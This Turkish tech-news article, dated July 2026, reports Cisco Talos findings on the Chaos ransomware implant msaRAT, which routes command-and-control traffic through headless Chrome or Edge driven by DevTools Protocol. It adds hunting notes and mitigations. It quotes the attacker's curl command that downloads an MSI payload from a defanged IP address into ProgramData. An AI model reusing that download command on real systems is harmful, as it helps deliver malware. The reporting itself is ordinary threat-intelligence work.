Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Yazı Tipi BoyutlandırıcıAa
  • Anasayfa
  • Teknoloji
    • Siber Güvenlik
    • Yapay Zeka
    • Donanım
    • Bilim
  • Yazılım
  • Savunma & İstihbarat
  • Oyun
  • Yaşam
    • Finans
    • Sinema
    • Dünyadan Haberler
  • İş Birliği
Okuma: Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor
Paylaş
Yazı Tipi BoyutlandırıcıAa
Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Ara
Bizi Takip Et
  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti
© 2026 Teknomers. All Rights Reserved.

Anasayfa » Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor

Siber Güvenlik

Acil: Chaos Ransomware, C2 Trafiğini Headless Tarayıcılar ile Yönlendiriyor

teknomers
Son güncelleme: 23 Temmuz 2026 19:20
teknomers
Paylaş
Paylaş

Giriş

Chaos fidye yazılım grubu, hedeflerinin kendi tarayıcıları üzerinden komut ve kontrol yapısını kurarak dikkat çekici bir saldırı gerçekleştirmiştir. Bu durum, tarayıcıların siber güvenlikteki rolünün ne kadar kritik olduğunu bir kez daha gözler önüne sermektedir.

Saldırı Nasıl Çalışıyor?

Cisco Talos, bu saldırının arkasındaki Rust tabanlı implant olan msaRAT‘ı detaylandırdı. Bu implant, etkilenen Windows bilgisayarında çalışarak, kendi başına dışa bağlantı kurmadan, 127.0.0.1 adresi ile iletişim kurar. Ana saldırı ise Chrome veya Edge’in headless modda başlatılmasıyla gerçekleşir ve tarayıcı, Chrome DevTools Protocol kullanılarak kontrol edilir.

Etkilenen Sistemler

Bu saldırı, genel olarak aşağıdaki sistemleri etkilemektedir:

  • Windows işletim sistemleri
  • Google Chrome
  • Microsoft Edge

Çözüm ve Korunma

Saldırının başlatılması için msaRAT implantı, hedef bilgisayara yüklenir ve ardından şifreleyici çalışmaya başlamadan önce etkisini gösterir. Cisco Talos’un açıkladığına göre saldırganın sistemi ele geçirmek için kullandığı yöntemler arasında:

  • Spam saldırıları
  • Vishing (sesli dolandırıcılık)
  • Quick Assist uygulaması
  • Uzaktan erişim yönetim (RMM) araçları

Aynı zamanda, implant bir curl komutuyla indirilir:
curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:programdataupdate_ms.msi

Bu yapılandırma, özellikle port 443 üzerinden düzgün biçimde kontrollere takılmadan geçmesine neden olur. Ayrıca, implant, dinamik bir DLL yükleyerek sistemde hedefe injectable bir durum yaratır.

Hunting Notes

Saldırının tespit edilmesi, süreç davranışlarına dayalı bir yaklaşım gerektirir. Cisco Talos’a göre, tüm dış iletişimler geçerli bir tarayıcı süreci olarak gözlemlenir. Bu nedenle, aşağıdaki kriterlerle sistemlerde arama yapılmalıdır:

  • Tarayıcıları başlatan bir installer, service veya başka bir ebeveyn süreç ile ilişkilendirme yapılmalıdır.
  • Tarayıcının –headless=new ve –remote-debugging-port ile çalıştığı süreçler incelenmelidir.
  • Debugging portuna giden döngüsel trafiği ve dışa WebRTC bağlantılarını takip edilmelidir.

Bu süreçte, özel işareti sağlayan öğeler arasında Runtime.addBinding ve Runtime.evaluate bulunmaktadır.

Sonuç

Okuyucular, sistemlerinde bu tür bir tehdidin önlenmesi amacıyla aşağıdaki adımları atmalıdır:

  • Yazılımlarını güncelleyerek güvenlik açıklarını kapatmalıdır.
  • Ağ güvenlik duvarlarındaki port ayarlarını gözden geçirmelidir.
  • Legitimite dışındaki Chrome veya Edge süreçlerini izlemelidir.

Unutulmamalıdır ki, msaRAT tarayıcı güvenlik açıklarına dayanmadığı için, mevcut bir tarayıcı güncellemesi ile önlenemez. Süreç davranışlarını takip etmek, saldırının erken aşamalarında tespit edilmesi için kritik öneme sahiptir.

Siber Saldırı Grand Palais RMN’yi Vurdu; Etkisi Sınırlı Görünüyor
Kritik Uyarı: İlk Zararlı Outlook Eklentisi 4,000+ Microsoft Kimliği Çalıyor
Sağlık Siber Güvenliği Liderlerinin FDA’nın Bölüm 524B Yönergeleri Hakkında Bilmesi Gerekenler
Slay the Spire, Hearthstone ile yeni Steam deste oluşturma roguelike oyununda buluşuyor
AB siber ajansı, havaalanı aksamalarına neden olan fidye yazılımı saldırısını doğruladı.
ETİKETLENDİ:AcilChaosHeadlessileRansomwaretarayıcılartrafiğiniYönlendiriyor
Bu Makaleyi Paylaş
Facebook Bağlantıyı Kopyala Yazdır
Paylaş
Önceki Makale Microsoft, Xbox Insiders için Ücretsiz Reklam Destekli Bulut Oyunları Test Ediyor
Sonraki Makale Kritik Uyarı: Notepad++ Eklentileriyle Gizli Zararlı Yazılım Yükleniyor

Sanal Medya

FacebookBeğen
452Takip Et
PinterestSabitle
237Takip Et

Son Eklenenler

Generatif Medyada Yoğunlaşma, Runway Yeni AI Model Yönlendiricisini Tanıttı
Yapay Zeka
Yeni yarı iletken firması TYLsemi, 43 milyon dolarla uygun fiyatlı silikon sunacak
Donanım
Acil Uyarı: Rus Hacker’lar Zimbra Açığını Kullanarak E-posta Çalıyor
Siber Güvenlik
İran Bağlantılı Saldırganlar Su ve Enerji Sunucularını Tehdit Ediyor
Genel
Acil Tehditler: Android Casus Yazılımlar, PLC Saldırıları ve Daha Fazlası
Siber Güvenlik
OpenAI Sağlık İçin ChatGPT’yi Herkese Sunuyor
Liste
//

Siber güvenlik, yapay zeka ve savunma sanayiinden; finans ve sinema dünyasına uzanan geniş bir yelpaze. Teknomers; teknoloji, strateji ve yazılım dünyasını sade bir dille sizlerle buluşturuyor.

Kurumsal

  • Hakkımızda
  • Gizlilik politikası
  • Tanıtım Yazısı ve Backlink Hizmeti

Kategoriler

  • Teknoloji
  • Oyun
  • Sinema
  • Siber Güvenlik
  • Bilim
  • Finans
  • Dünyadan Güncel Haberler

Populer

  • TV'de Ücretsiz İzlenebilen Şifresiz Erotik Kanallar (2025 Güncel Frekans Listesi)

  • The Last of Us PC Kontrolleri: Hızlı Silah Değiştirme ve Tüm Tuşlar (2025)

  • Hogwarts Legacy'de Odaklanma İksiri Nasıl Yapılır?

Teknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor HaberleriTeknomers | Dünyadan Güncel Teknoloji | Oyun | Müzik | Film | Spor Haberleri
Bizi Takip Et
© 2026 Teknomers. All Rights Reserved.
Welcome Back!

Sign in to your account

Kullanıcı Adı veya E-posta Adresi
Şifre

Şifrenizi mi unuttunuz?